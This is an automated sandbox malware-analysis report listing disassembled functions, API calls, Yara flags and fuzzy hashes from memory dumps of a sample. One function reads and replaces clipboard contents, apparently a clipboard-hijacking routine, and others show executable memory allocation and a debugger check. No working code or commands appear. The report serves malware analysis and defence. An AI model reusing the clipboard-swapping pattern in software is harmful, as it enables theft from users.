Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4b3f2dadeb50f47f9dffb3410bc12ca49dcb814039e7263dfb2ecc5297b295b0
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9ED0123124512877D7003A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 4041394d8d78199f775e51363b91ee130c439746850656ecd204df5dd4e94baa
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 4041394d8d78199f775e51363b91ee130c439746850656ecd204df5dd4e94baa
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 00403FE6 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00404013

Part of subcall function 0040D8D2: std::ios_base::_Tidy.LIBCPMT ref: 0040D8F2

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID:
API String ID: 3167631304-0
Opcode ID: c5c6a10da82d5cb85acd3c67c2a5e2871c35b3401e3d505337f39e832f3bfbc5
Instruction ID: 7d37f3ede7cf9769cdb718ad670fe7035eeccf3b0a3ab131a30f2fae2b4dd07b
Opcode Fuzzy Hash: c5c6a10da82d5cb85acd3c67c2a5e2871c35b3401e3d505337f39e832f3bfbc5
Instruction Fuzzy Hash: EFE04F72948644EBC705CF88D941B45B7E8F709B28F20827FE522A3AC0C77DA5048A18

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 005F0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005F04B6

Memory Dump Source

Source File: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4b3b82a961298218d86c1796e32c64b7e5f876bbfa977958dd870988312921ef
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7C112079A40208EFDB01DF98C985E98BFF5AF08351F058094FA489B362D375EA50DF40

Non-executed Functions

Function 00631942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0063194D
Sleep.KERNEL32(00001541), ref: 00631957

Part of subcall function 0063CE77: _strlen.LIBCMT ref: 0063CE8E

OpenClipboard.USER32(00000000), ref: 00631984
GetClipboardData.USER32(00000001), ref: 00631994
_strlen.LIBCMT ref: 006319B0
_strlen.LIBCMT ref: 006319DF
_strlen.LIBCMT ref: 00631B23
EmptyClipboard.USER32 ref: 00631B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 00631B46
GlobalUnlock.KERNEL32(00000000), ref: 00631B70
SetClipboardData.USER32(00000001,00000000), ref: 00631B79
GlobalFree.KERNEL32(00000000), ref: 00631B80
CloseClipboard.USER32 ref: 00631BA4
Sleep.KERNEL32(000002D2), ref: 00631BAF

Strings

4#E, xrefs: 0063195D
i, xrefs: 006319C0

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 5f932d4a35bf3d67130d28d9b8cc581da309e10ec6beda9cf7fa93a18f247e30
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 9151F630C00795DAD3119FA4DD56BEDB774FF2A302F045228E805A6163EB709A85C7A9

Function 00632361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0063239C
GetClientRect.USER32(?,?), ref: 006323B1
GetDC.USER32(?), ref: 006323B8
CreateSolidBrush.GDI32(00646464), ref: 006323CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 006323EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0063240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00632416
MulDiv.KERNEL32(00000008,00000000), ref: 0063241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00632443
SetBkMode.GDI32(?,00000001), ref: 006324CE
_wcslen.LIBCMT ref: 006324E6

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: cd24c403c68de9b49e8ca88ef83f1cc66b48e0467fe7b8c0b4fd1b9cc70d9231
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 1B71FD72900218AFDB62DF64DD85FAEB7BCEB09711F0042A5F509E6151DA70AF84CF64

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#INF, xrefs: 0043E9CB
1#QNAN, xrefs: 0043E9C4
1#SNAN, xrefs: 0043E9BD
1#IND, xrefs: 0043E9B6

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0066B271 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00660A23,?,?,?,?,0066047A,?,00000004), ref: 0066B353
_wcschr.LIBVCRUNTIME ref: 0066B3E3
_wcschr.LIBVCRUNTIME ref: 0066B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,#f,00000000,?), ref: 0066B494

Strings

#f, xrefs: 0066B36A, 0066B3B2, 0066B45A

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID: #f
API String ID: 2444527052-2608074060
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 3a70cfe08c904bf5822f344798859eca162f6291a35dc1d132b0b5f72ed4d4a8
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: AF610771600206EADB24AB74DC42BFA73EEEF05710F14542EF905DB282EB74E98087A4

Function 0066B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0066BCF4,?,00000000), ref: 0066BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0066BCF4,?,00000000), ref: 0066BA97
GetACP.KERNEL32(?,?,0066BCF4,?,00000000), ref: 0066BAAC

Strings

ACP, xrefs: 0066B9F3
OCP, xrefs: 0066BA29

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: ad37051ec598ade6d1e4e9ee230896d8633e69e881ffd1ad48b2da07198775f6
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 6021B032600104EAE7348F95D901BE773A7EB50F60B5AA065E90ADB304F732DEC1C394

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

OCP, xrefs: 0043B7C2
ACP, xrefs: 0043B78C

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0066BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

Part of subcall function 00662141: _free.LIBCMT ref: 006621A0
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0066BCB5
IsValidCodePage.KERNEL32(00000000), ref: 0066BD10
IsValidLocale.KERNEL32(?,00000001), ref: 0066BD1F
GetLocaleInfoW.KERNEL32(?,00001001,00660A1C,00000040,?,00660B3C,00000055,00000000,?,?,00000055,00000000), ref: 0066BD67
GetLocaleInfoW.KERNEL32(?,00001002,00660A9C,00000040), ref: 0066BD86

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 6e541484dc6a565e5d56f78cac1cddee0de5468ea2873151b8bdb6624dcb7fe7
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: DD51A371900209EFEB10EFA5DC45AFEB7BAFF14700F141429E905E7291EB719A848B65

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0065ED47 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

Lf, xrefs: 0065F1AF, 0065EF99, 0065EE28
Lf, xrefs: 0065ED64, 0065EF0F, 0065F133, 0065F0CD, 0065EF5D, 0065EEEB

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID: Lf$Lf
API String ID: 0-4159625070
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 5b5ea3591d601e5daf2ca76623de7d40be9281046042277f61d816e5df728a69
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 36022D71E002199BDF28CFA9C8906EDB7F2EF48315F254269D919E7384D731AE45CB84

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84
C, xrefs: 0042EF48, 0042ED32, 0042EBC1

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0065A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0063DAD7), ref: 0065A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0063DAD7), ref: 0065A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0063DAD7), ref: 0065A749

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: c21f9556a5a449f2d7f8b86659e32fef9e854926e107766860102f91b83e1e0e
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
